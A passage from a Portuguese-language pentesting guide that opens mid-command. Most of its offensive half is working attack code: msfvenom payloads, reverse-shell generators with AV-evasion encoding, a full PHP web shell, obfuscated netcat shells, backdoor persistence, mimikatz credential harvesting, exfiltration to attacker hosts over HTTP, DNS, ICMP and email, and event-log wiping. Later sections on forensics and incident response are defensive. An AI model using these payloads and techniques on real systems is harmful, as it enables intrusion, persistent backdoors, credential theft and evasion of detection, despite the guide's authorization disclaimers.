LHOST=192.168.1.100 LPORT=4444 -f elf > shell.elf
# Linux meterpreter (staged)
msfvenom -p linux/x86/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f elf > meterpreter.elf
# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp \
LPORT=4444 -f elf > bindshell.elf
# Encoded payload (evade AV)
msfvenom -p linux/x86/shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 \
-e x86/shikata_ga_nai -i 3 -f elf > encoded.elf
🪟 Windows Payloads
# Windows reverse shell (exe)
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe
# Windows meterpreter
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f exe > meterpreter.exe
# Windows service payload
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f exe-service > service.exe
# DLL payload
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f dll > shell.dll
# PowerShell one-liner
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f psh-cmd
🌐 Web Payloads
# PHP web shell
msfvenom -p php/reverse_php \
LHOST=192.168.1.100 LPORT=4444 -f raw > shell.php
# JSP payload
msfvenom -p java/jsp_shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f raw > shell.jsp
# ASP payload
msfvenom -p windows/shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f asp > shell.asp
# Python payload
msfvenom -p python/shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f raw > shell.py
# Bash one-liner
msfvenom -p cmd/unix/reverse_bash \
LHOST=192.168.1.100 LPORT=4444 -f raw
📱 Mobile & Multi-Platform
# Android APK
msfvenom -p android/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -o payload.apk
# macOS payload
msfvenom -p osx/x86/shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f macho > shell.macho
# Java payload (cross-platform)
msfvenom -p java/shell_reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 -f jar > shell.jar
# Multi-handler setup
echo "use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit" > handler.rc
msfconsole -r handler.rc
Desenvolvimento de Payloads Customizados
🐍 Python Reverse Shell Generator
#!/usr/bin/env python3
"""
Custom Python Reverse Shell Generator
Gera shells personalizados com evasão básica
"""
import base64
import sys
def generate_python_shell(lhost, lport, obfuscate=True):
basic_shell = f'''
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{lhost}",{lport}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
'''
if obfuscate:
# Base64 encode
encoded = base64.b64encode(basic_shell.encode()).decode()
obfuscated = f'''
import base64,sys
exec(base64.b64decode("{encoded}").decode())
'''
return obfuscated
return basic_shell
def generate_powershell_shell(lhost, lport):
ps_shell = f'''
$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{{0}};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
}};
$client.Close()
'''
# Encode for evasion
encoded_bytes = [str(ord(char)) for char in ps_shell]
encoded_cmd = f"[char[]]({','.join(encoded_bytes)}) -join ''"
return f"powershell -nop -w hidden -e " + base64.b64encode(f"IEX({encoded_cmd})".encode('utf-16le')).decode()
# Exemplo de uso
if __name__ == "__main__":
lhost = "192.168.1.100"
lport = "4444"
print("=== Python Reverse Shell ===")
print(generate_python_shell(lhost, lport))
print("\n=== PowerShell Reverse Shell ===")
print(generate_powershell_shell(lhost, lport))
🌐 Advanced Web Shell Generator
<?php
/**
* Advanced PHP Web Shell
* Features: Command execution, file upload, download, basic evasion
*/
// Basic authentication (change password!)
$password = "pentesting123";
session_start();
if (!isset($_SESSION['authenticated'])) {
if (isset($_POST['pwd']) && $_POST['pwd'] == $password) {
$_SESSION['authenticated'] = true;
} else {
echo '<form method="post"><input type="password" name="pwd" placeholder="Password"><input type="submit"></form>';
exit;
}
}
echo "<h2>Web Shell - Current Directory: " . getcwd() . "</h2>";
// Command execution
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
echo "<pre>";
// Multiple execution methods for better compatibility
if (function_exists('system')) {
system($cmd);
} elseif (function_exists('shell_exec')) {
echo shell_exec($cmd);
} elseif (function_exists('exec')) {
exec($cmd, $output);
echo implode("\n", $output);
} elseif (function_exists('passthru')) {
passthru($cmd);
} else {
echo "No execution functions available!";
}
echo "</pre>";
}
// File upload functionality
if (isset($_FILES['file'])) {
$target = $_FILES['file']['name'];
if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
echo "<p>File uploaded: $target</p>";
}
}
// Simple file browser
echo "<h3>Files in current directory:</h3>";
$files = scandir('.');
foreach ($files as $file) {
if ($file != '.' && $file != '..') {
echo "<a href='?download=$file'>$file</a> | ";
echo "<a href='?delete=$file' onclick='return confirm(\"Delete $file?\")'>[DEL]</a><br>";
}
}
// Download functionality
if (isset($_GET['download'])) {
$file = $_GET['download'];
if (file_exists($file)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $file . '"');
readfile($file);
exit;
}
}
// Delete functionality
if (isset($_GET['delete'])) {
$file = $_GET['delete'];
if (unlink($file)) {
echo "<p>Deleted: $file</p>";
}
}
?>
<!-- Interface -->
<form method="post">
<input type="text" name="cmd" placeholder="Command" size="50">
<input type="submit" value="Execute">
</form>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
🔒 Payload Obfuscation Techniques
#!/bin/bash
# Advanced Payload Obfuscation Script
# 1. Base64 Encoding (multiple layers)
echo "nc -e /bin/bash 192.168.1.100 4444" | base64 | base64
# 2. Hex Encoding
echo "nc -e /bin/bash 192.168.1.100 4444" | xxd -p | tr -d '\n'
# 3. Character substitution
original="nc -e /bin/bash 192.168.1.100 4444"
obfuscated=$(echo "$original" | sed 's/n/\\156/g; s/c/\\143/g')
# 4. Environment variable hiding
export H="192.168.1.100"
export P="4444"
export C="nc -e /bin/bash"
eval "$C $H $P"
# 5. Function-based obfuscation
function x() { nc -e /bin/bash $1 $2; }
x 192.168.1.100 4444
# 6. PowerShell obfuscation techniques
# Character replacement
$cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/shell.ps1')"
$obf = $cmd -replace 'I','[char]73' -replace 'E','[char]69' -replace 'X','[char]88'
# Variable substitution
$h='192.168.1.100'
$p='shell.ps1'
$url="http://$h/$p"
IEX(New-Object Net.WebClient).DownloadString($url)
🧪 Teste e Validação de Payloads
✅ Checklist de Teste:
- • Testar payload em ambiente isolado
- • Verificar compatibilidade com target OS
- • Validar conectividade de rede
- • Testar evasão de AV/EDR
- • Verificar estabilidade da conexão
- • Documentar funcionalidades
- • Preparar handlers apropriados
⚠️ Considerações de Segurança:
- • Nunca usar em sistemas de produção
- • Sempre obter autorização por escrito
- • Usar apenas em labs controlados
- • Não deixar backdoors permanentes
- • Limpar artefatos após teste
- • Seguir responsible disclosure
- • Manter logs de atividades
Post-Exploitation
Técnicas Avançadas Pós-Comprometimento para Testes de Penetração
🚨 AVISO EXTREMAMENTE CRÍTICO
Post-Exploitation é EXCLUSIVO para pentesting autorizado! Estas técnicas simulam ataques reais de APT e devem ser usadas apenas em ambientes controlados.
USO NÃO AUTORIZADO = CRIME HEDIONDO com penas severas. Sempre tenha autorização escrita, escopo definido e ambiente isolado.
Fases da Post-Exploitation
1. Stabilize
Estabilizar acesso
2. Enumerate
Enumerar sistema
3. Escalate
Elevar privilégios
4. Persist
Manter acesso
5. Pivot
Movimento lateral
6. Exfiltrate
Extrair dados
🎯 Kill Chain Pós-Comprometimento
🔥 Immediate Actions:
- • Upgrade to interactive shell
- • Establish persistence
- • Basic system enumeration
- • Check user privileges
- • Identify OS and architecture
🕵️ Discovery Phase:
- • Network reconnaissance
- • User and group enumeration
- • Process and service analysis
- • File system exploration
- • Application inventory
🎯 Advanced Objectives:
- • Domain enumeration
- • Credential harvesting
- • Lateral movement
- • Data exfiltration
- • Long-term persistence
Enumeração Sistemática Pós-Comprometimento
🐧 Linux Post-Exploitation Enumeration
#!/bin/bash
# Linux Post-Exploitation Enumeration Script
echo "=== SYSTEM INFORMATION ==="
hostname
uname -a
cat /etc/os-release
uptime
id
groups
echo -e "\n=== NETWORK CONFIGURATION ==="
ifconfig -a || ip addr show
netstat -tulpn 2>/dev/null || ss -tulpn
cat /etc/resolv.conf
arp -a 2>/dev/null || ip neigh
echo -e "\n=== USER ENUMERATION ==="
cat /etc/passwd | grep -v nologin
cat /etc/group
w
last -n 10
cat /home/*/.bash_history 2>/dev/null | head -50
echo -e "\n=== PRIVILEGE ESCALATION VECTORS ==="
sudo -l 2>/dev/null
find / -perm -4000 2>/dev/null | head -20
find / -perm -2000 2>/dev/null | head -20
getcap -r / 2>/dev/null | head -10
echo -e "\n=== SERVICES AND PROCESSES ==="
ps aux | head -20
systemctl list-units --type=service --state=running 2>/dev/null || service --status-all 2>/dev/null
crontab -l 2>/dev/null
cat /etc/crontab 2>/dev/null
echo -e "\n=== INTERESTING FILES ==="
find /home -name "*.txt" -o -name "*.pdf" -o -name "*.doc*" 2>/dev/null | head -10
find / -name "*password*" -o -name "*secret*" -o -name "*key*" 2>/dev/null | head -10
ls -la /tmp /var/tmp /dev/shm 2>/dev/null
🪟 Windows Post-Exploitation Enumeration
@echo off
REM Windows Post-Exploitation Enumeration
echo === SYSTEM INFORMATION ===
systeminfo
hostname
whoami
whoami /priv
whoami /groups
echo.
echo === NETWORK CONFIGURATION ===
ipconfig /all
netstat -ano
route print
arp -a
echo.
echo === USER ENUMERATION ===
net user
net localgroup
net localgroup administrators
query user
cmdkey /list
echo.
echo === PRIVILEGE ESCALATION VECTORS ===
icacls "C:\Program Files" | findstr Everyone
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
wmic service get name,displayname,pathname,startmode | findstr /i "auto"
echo.
echo === PROCESSES AND SERVICES ===
tasklist /svc
wmic process get processid,parentprocessid,name,commandline
sc query state= all
schtasks /query /fo LIST /v
echo.
echo === INTERESTING FILES AND REGISTRY ===
dir /s C:\*password* 2>nul | findstr File
dir /s C:\*secret* 2>nul | findstr File
reg query HKLM /f password /t REG_SZ /s 2>nul | findstr /i password
reg query HKCU /f password /t REG_SZ /s 2>nul | findstr /i password
Técnicas de Escalação de Privilégios
🔓 Linux Privilege Escalation
Common Vectors:
# SUID/SGID Binaries
find / -perm -4000 2>/dev/null
find / -perm -2000 2>/dev/null
# Sudo privileges
sudo -l
# Capabilities
getcap -r / 2>/dev/null
# Writable /etc/passwd
ls -la /etc/passwd
# Cron jobs
crontab -l
cat /etc/crontab
ls -la /etc/cron*
# World-writable files
find / -perm -2 -type f 2>/dev/null
# Kernel exploits
uname -a
cat /proc/version
Automated Tools:
# LinPEAS (Linux Privilege Escalation Awesome Script)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
# GTFO Bins
# Check https://gtfobins.github.io/
# Example: vim privilege escalation
sudo vim -c ':!/bin/sh'
🪟 Windows Privilege Escalation
Common Techniques:
# Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
# Service permissions
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Registry AutoRun
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Scheduled Tasks
schtasks /query /fo LIST /v | findstr /i taskname
# DLL Hijacking opportunities
for /f %i in ('dir /b C:\windows\system32\*.*') do echo %i
PowerShell Tools:
# PowerUp (PowerSploit)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks
# WinPEAS
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
# Sherlock (Watson)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
Find-AllVulns
# JAWS (Just Another Windows Enum Script)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1')
Técnicas de Persistência
🐧 Linux Persistence
# SSH Key Persistence
mkdir -p ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Cron Job Persistence
(crontab -l ; echo "*/10 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'") | crontab -
# Bashrc Persistence
echo "nohup bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1' &" >> ~/.bashrc
# Service Persistence (systemd)
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
After=network.target
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'
Restart=always
User=root
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service
systemctl start backdoor.service
# Binary Replacement
cp /bin/nc /tmp/original_nc
echo '#!/bin/bash
/tmp/original_nc "$@"
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1 &
' > /bin/nc
# SUID Backdoor
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
🪟 Windows Persistence
REM Registry Run Keys
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\System32\backdoor.exe"
REM Scheduled Task Persistence
schtasks /create /sc minute /mo 10 /tn "Windows Update Check" /tr "powershell -WindowStyle Hidden -Command \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/shell.ps1')\""
REM Service Persistence
sc create Backdoor binpath= "cmd /c powershell -WindowStyle Hidden -Command \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/shell.ps1')\""
sc config Backdoor start= auto
REM WMI Event Subscription
wmic /namespace:"\\root\subscription" path __EventFilter create Name="Backdoor", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"
REM Sticky Keys Backdoor
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
REM DLL Hijacking
copy backdoor.dll "C:\Program Files\Application\hijackable.dll"
Movimento Lateral e Pivoting
🌐 Network Pivoting Techniques
# SSH Tunneling
ssh -L 8080:internal-server:80 user@compromised-host
ssh -D 9050 user@compromised-host # SOCKS proxy
# Chisel (HTTP tunneling)
# On attacker machine
./chisel server -p 8000 --reverse
# On compromised machine
./chisel client attacker-ip:8000 R:9001:internal-target:3389
# Netsh Port Forwarding (Windows)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=internal-server
# Socat Pivoting
socat TCP-LISTEN:8080,fork TCP:internal-server:80
# Meterpreter Pivoting
# In meterpreter session
run autoroute -s 192.168.1.0/24
use auxiliary/server/socks_proxy
set SRVPORT 9050
run
# Proxychains configuration
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf
proxychains nmap -sT 192.168.1.0/24
🎯 Credential Harvesting
# Mimikatz (Windows)
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::kerberos
lsadump::sam
lsadump::secrets
# LaZagne (Multi-platform)
python laZagne.py all
# Linux credential harvesting
cat /etc/shadow
cat /etc/passwd
grep -r "password" /etc/
find /home -name "*.ssh" 2>/dev/null
cat ~/.bash_history | grep -E "(ssh|scp|mysql|ftp)" | head -10
# Browser credential extraction
# Chrome passwords (Linux)
find ~/.config/google-chrome/Default -name "Login Data" 2>/dev/null
# Firefox passwords (Linux)
find ~/.mozilla/firefox -name "*.default*" 2>/dev/null
# Memory dump analysis
strings /proc/[PID]/mem | grep -E "(password|pass|pwd)"
# Network credential sniffing
tcpdump -i any -s 0 -A 'port 21 or port 23 or port 110 or port 143'
Técnicas de Exfiltração de Dados
📤 Exfiltração via HTTP/DNS
# HTTP POST exfiltration
curl -X POST -F "data=@/etc/passwd" http://attacker-server/upload
# Base64 encoded HTTP exfiltration
cat sensitive_file | base64 | curl -X POST -d @- http://attacker-server/data
# DNS exfiltration
for line in $(cat /etc/passwd | base64 -w0 | fold -w50); do
nslookup $line.attacker-domain.com
done
# ICMP exfiltration
cat secret.txt | base64 | while read line; do
ping -c 1 -p $(echo $line | xxd -p | tr -d '\n') attacker-ip
done
# PowerShell HTTP exfiltration (Windows)
$data = [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\sensitive.txt"))
Invoke-WebRequest -Uri "http://attacker-server/upload" -Method POST -Body $data
# Email exfiltration
tar czf - /home/user/documents | base64 | mail -s "Backup" attacker@gmail.com
🔒 Steganography & Covert Channels
# Steganography with images
steghide embed -cf cover.jpg -ef secret.txt -sf output.jpg
# Hide data in whitespace
# Create file with hidden data in spaces/tabs
echo -e "Normal text\t\t \tHidden data in whitespace"
# Social media exfiltration
# Post data as image comments on public posts
convert -size 800x600 -background black -fill white -pointsize 12 \
text:"$(base64 sensitive.txt)" output.png
# Git exfiltration (if git access available)
git init /tmp/exfil
cp sensitive_files /tmp/exfil/
cd /tmp/exfil
git add .
git commit -m "Normal commit"
git remote add origin https://github.com/attacker/innocent-repo
git push origin main
# Cloud storage exfiltration
rclone copy sensitive_data remote:backup/
# Cryptocurrency blockchain exfiltration
# Encode data in Bitcoin transactions (OP_RETURN)
bitcoin-cli sendmany "" '{}' 0 "" "$(echo "secret data" | base64)"
🧹 Anti-Forensics e Limpeza de Artefatos
🗑️ Limpeza de Logs:
# Linux log cleanup
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
echo "" > ~/.bash_history
history -c
unset HISTFILE
# Windows event log cleanup
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
⚠️ Considerações Éticas:
- • Documentar todas as ações realizadas
- • Manter logs detalhados do teste
- • Restaurar sistema ao estado original
- • Remover todas as backdoors instaladas
- • Entregar relatório completo ao cliente
- • Seguir scope agreement rigorosamente
Digital Forensics
Investigação Digital e Análise Forense para Cibersegurança
⚖️ AVISO LEGAL E ÉTICO
Forense Digital requer AUTORIZAÇÃO LEGAL! Este conteúdo é para profissionais autorizados e educação. Investigações não autorizadas violam privacidade e leis.
Sempre seguir cadeia de custódia e procedimentos legais. Use apenas em equipamentos próprios, labs autorizados ou com ordem judicial válida.
Metodologia de Investigação Forense
1. Identify
Identificar evidências
2. Preserve
Preservar integridade
3. Collect
Coletar dados
4. Examine
Examinar evidências
5. Analyze
Analisar dados
6. Report
Gerar relatório
🔬 Princípios Fundamentais
📋 Cadeia de Custódia:
- • Documentação detalhada
- • Controle de acesso rigoroso
- • Hash de integridade (MD5/SHA)
- • Timeline de manipulação
- • Assinatura de responsáveis
🛡️ Preservação de Dados:
- • Imagem bit-a-bit (DD/E01)
- • Write blockers físicos/software
- • Duplicação forense
- • Verificação de integridade
- • Armazenamento seguro
⚖️ Aspectos Legais:
- • Marco Civil da Internet
- • LGPD compliance
- • Código Penal - Art. 154-A
- • Autorização judicial
- • Admissibilidade probatória
Ferramentas e Técnicas Forenses
💿 Aquisição de Imagem Forense
# Instalar ferramentas forenses no Termux
pkg install ddrescue
pkg install testdisk
pkg install foremost
pkg install binwalk
# DD - Cópia bit-a-bit básica
dd if=/dev/sdb of=evidence.img bs=4096 conv=noerror,sync
# Calcular hash da imagem
md5sum evidence.img > evidence.md5
sha256sum evidence.img > evidence.sha256
# DDRescue - Para discos danificados
ddrescue /dev/sdb evidence.img evidence.log
# DC3DD - Versão forense aprimorada
dc3dd if=/dev/sdb of=evidence.img hash=md5 hash=sha256 log=acquisition.log
# Ewfacquire - Formato Expert Witness (E01)
ewfacquire /dev/sdb
# Especificar case number, evidence number, description
# Verificar integridade da imagem
ewfverify evidence.E01
# Mount de imagem forense (read-only)
mkdir /tmp/evidence
mount -o ro,loop evidence.img /tmp/evidence
🔍 Análise de Sistema de Arquivos
# The Sleuth Kit (TSK) - Análise de filesystem
# Listar partições
mmls evidence.img
# Analisar filesystem
fsstat -o 2048 evidence.img
# Listar arquivos (incluindo deletados)
fls -r -o 2048 evidence.img
# Recuperar arquivo específico por inode
icat -o 2048 evidence.img 1234 > recovered_file.txt
# Timeline de atividade do filesystem
fls -r -m / -o 2048 evidence.img > bodyfile.txt
mactime -b bodyfile.txt -d > timeline.csv
# Autopsy - Interface web para TSK
autopsy
# Acesse http://localhost:9999/autopsy
# TestDisk - Recuperação de partições
testdisk evidence.img
# PhotoRec - Recuperação de arquivos
photorec evidence.img
# Foremost - Carving de arquivos
foremost -i evidence.img -o recovered/
🔐 Análise de Memória RAM
# Volatility Framework - Análise de memória
# Dump de memória (Windows)
# Use DumpIt.exe, FTK Imager, ou Redline
# Identificar perfil do sistema
volatility -f memory.dmp imageinfo
# Listar processos ativos
volatility -f memory.dmp --profile=Win7SP1x64 pslist
volatility -f memory.dmp --profile=Win7SP1x64 psscan
# Dump de processo específico
volatility -f memory.dmp --profile=Win7SP1x64 procdump -p 1234 -D output/
# Conexões de rede
volatility -f memory.dmp --profile=Win7SP1x64 netscan
# Histórico de comandos
volatility -f memory.dmp --profile=Win7SP1x64 cmdscan
volatility -f memory.dmp --profile=Win7SP1x64 consoles
# Registry hives
volatility -f memory.dmp --profile=Win7SP1x64 hivelist
volatility -f memory.dmp --profile=Win7SP1x64 printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"
# Malware detection
volatility -f memory.dmp --profile=Win7SP1x64 malfind
volatility -f memory.dmp --profile=Win7SP1x64 apihooks
📱 Forense Mobile
# ADB - Android Debug Bridge
adb devices
adb shell dumpsys
adb pull /data/data/com.android.providers.contacts/ contacts/
adb logcat > device_logs.txt
# Android Forensics with dd (root required)
adb shell su -c "dd if=/dev/block/userdata of=/sdcard/userdata.img"
adb pull /sdcard/userdata.img
# MSAB XRY Mobile Forensics (Commercial)
# Cellebrite UFED (Commercial)
# Santoku Linux - Mobile forensics distro
# Includes tools for iOS and Android
# iOS Forensics (jailbreak required)
# SSH into device
ssh root@iphone-ip
# Dump filesystem
tar -czf /tmp/ios_dump.tar.gz /
# WhatsApp Forensics
# Android: /data/data/com.whatsapp/databases/
# iOS: /private/var/mobile/Applications/WhatsApp/
# Telegram Forensics
# Encrypted, requires specific tools
# Check cache and temporary files
# Browser forensics (mobile)
# Chrome: /data/data/com.android.chrome/
# Safari: /private/var/mobile/Applications/Safari/
Forense de Rede e Traffic Analysis
🌐 Captura e Análise de Tráfego
# Wireshark - Análise de protocolos
# GUI: wireshark
# CLI: tshark
# Captura básica com tcpdump
tcpdump -i eth0 -w capture.pcap
# Captura filtrada
tcpdump -i eth0 'host 192.168.1.100 and port 80' -w web_traffic.pcap
# Tshark - Análise em linha de comando
# Estatísticas básicas
tshark -r capture.pcap -q -z conv,ip
tshark -r capture.pcap -q -z http,tree
# Extrair objetos HTTP
tshark -r capture.pcap --export-objects http,extracted/
# Filtros úteis
tshark -r capture.pcap -Y "dns.qry.name contains malware"
tshark -r capture.pcap -Y "http.request.method == POST"
tshark -r capture.pcap -Y "ssl.handshake.certificate"
# NetworkMiner - Network forensic analysis
# GUI tool for Windows/Linux
# Automatically extracts files, images, certificates
# Zeek (Bro) - Network analysis framework
zeek -r capture.pcap local
# Generates multiple log files: conn.log, http.log, dns.log
# Análise de logs Zeek
cat conn.log | zeek-cut id.orig_h id.resp_h proto service
cat http.log | zeek-cut ts method host uri
🚨 Indicadores de Comprometimento (IoCs)
Network IoCs:
- • Conexões para IPs maliciosos conhecidos
- • Tráfego DNS para domínios suspeitos
- • Protocolos incomuns (IRC, P2P)
- • Uploads de dados volumosos
- • Beaconing (tráfego regular)
- • Conexões criptografadas suspeitas
Behavioral Analysis:
- • User-Agent strings anômalos
- • Timing patterns suspeitos
- • Múltiplas conexões falhadas
- • Tráfego em horários incomuns
- • Baseline deviation
- • Lateral movement patterns
📊 Análise de Evidências e Relatórios
🔍 Análise Avançada:
- • Timeline analysis (Super Timeline)
- • Correlation de eventos
- • Pattern recognition
- • Statistical analysis
- • Machine learning para anomalias
- • Graph analysis (Maltego)
- • YARA rules para malware
📝 Documentação Legal:
- • Executive summary
- • Metodologia utilizada
- • Cadeia de custódia completa
- • Findings técnicos detalhados
- • Screenshots e evidências
- • Conclusões e recomendações
- • Anexos com dados técnicos
Incident Response
Resposta Rápida a Incidentes de Segurança Cibernética
🚨 PROTOCOLO DE EMERGÊNCIA CIBERNÉTICA
Incident Response é MISSÃO CRÍTICA! Cada minuto conta durante um incidente. Siga protocolos estabelecidos e mantenha comunicação com stakeholders.
EM CASO DE INCIDENTE ATIVO: Isole sistemas comprometidos, preserve evidências, acione equipe de resposta e documente todas as ações.
Framework NIST de Incident Response
1. Preparation
Preparação e Planejamento
2. Detection
Detecção e Análise
3. Containment
Contenção e Erradicação
4. Recovery
Recuperação e Lições
🛠️ Fase 1: Preparação
📋 Planejamento:
- • Incident Response Plan (IRP)
- • Roles and responsibilities
- • Communication plan
- • Escalation procedures
- • Legal requirements
- • Business continuity plan
👥 Equipe CSIRT:
- • Incident Manager
- • Security Analysts
- • Forensics Specialists
- • Network Engineers
- • Legal Counsel
- • Communications Lead
🛡️ Ferramentas:
- • SIEM/SOC platform
- • Forensics toolkit
- • Communication tools
- • Backup systems
- • Isolation capabilities
- • Documentation systems
🔍 Fase 2: Detecção e Análise
🚨 Fontes de Detecção:
- • SIEM alerts
- • IDS/IPS signatures
- • Antivirus alerts
- • User reports
- • Network monitoring
- • Threat intelligence feeds
- • Honeypots
🔬 Análise Inicial:
- • Severity assessment
- • Impact analysis
- • Indicator collection
- • Timeline construction
- • Attribution analysis
- • Scope determination
- • Evidence preservation
Classificação e Priorização de Incidentes
🚩 Matriz de Severidade
Sistemas críticos comprometidos, dados exfiltrados
Malware ativo, tentativa de lateral movement
Phishing direcionado, vulnerability exploitation
Spam, port scanning, policy violations
📊 Fatores de Classificação
#!/usr/bin/env python3
"""
Incident Classification Calculator
Calcula severidade baseada em múltiplos fatores
"""
def calculate_incident_severity(factors):
"""
Calcula severidade do incidente (1-10)
"""
score = 0
# Impact on business (0-3)
business_impact = {
'none': 0,
'minimal': 1,
'significant': 2,
'critical': 3
}
score += business_impact.get(factors.get('business_impact', 'none'), 0)
# Data sensitivity (0-3)
data_sensitivity = {
'public': 0,
'internal': 1,
'confidential': 2,
'restricted': 3
}
score += data_sensitivity.get(factors.get('data_sensitivity', 'public'), 0)
# System criticality (0-2)
system_criticality = {
'non_critical': 0,
'important': 1,
'critical': 2
}
score += system_criticality.get(factors.get('system_criticality', 'non_critical'), 0)
# Scope of incident (0-2)
scope = {
'single_system': 0,
'multiple_systems': 1,
'organization_wide': 2
}
score += scope.get(factors.get('scope', 'single_system'), 0)
return min(score, 10)
# Exemplo de uso
incident_factors = {
'business_impact': 'critical',
'data_sensitivity': 'restricted',
'system_criticality': 'critical',
'scope': 'organization_wide'
}
severity = calculate_incident_severity(incident_factors)
print(f"Incident Severity: {severity}/10")
if severity >= 8:
print("Priority: P1 (Critical)")
elif severity >= 6:
print("Priority: P2 (High)")
elif severity >= 4:
print("Priority: P3 (Medium)")
else:
print("Priority: P4 (Low)")
Contenção, Erradicação e Recuperação
🚧 Estratégias de Contenção
#!/bin/bash
# Incident Response Containment Script
echo "=== EMERGENCY CONTAINMENT PROCEDURES ==="
# 1. Network Isolation
echo "1. Network Isolation:"
echo "# Isolate compromised host"
iptables -A INPUT -s COMPROMISED_IP -j DROP
iptables -A OUTPUT -d COMPROMISED_IP -j DROP
echo "# Block malicious domains in DNS"
echo "0.0.0.0 malicious-domain.com" >> /etc/hosts
echo "# Firewall rules to block C2"
iptables -A OUTPUT -d MALICIOUS_IP -j DROP
# 2. Account Security
echo -e "\n2. Account Security:"
echo "# Disable compromised accounts"
usermod -L compromised_user
passwd -l compromised_user
echo "# Force password reset for affected users"
chage -d 0 affected_user
echo "# Revoke active sessions"
pkill -u compromised_user
# 3. Service Containment
echo -e "\n3. Service Containment:"
echo "# Stop compromised services"
systemctl stop compromised_service
systemctl disable compromised_service
echo "# Quarantine suspicious files"
mv suspicious_file /quarantine/
echo "# Block file execution"
chmod -x suspicious_executable
# 4. Memory Dump (before shutdown)
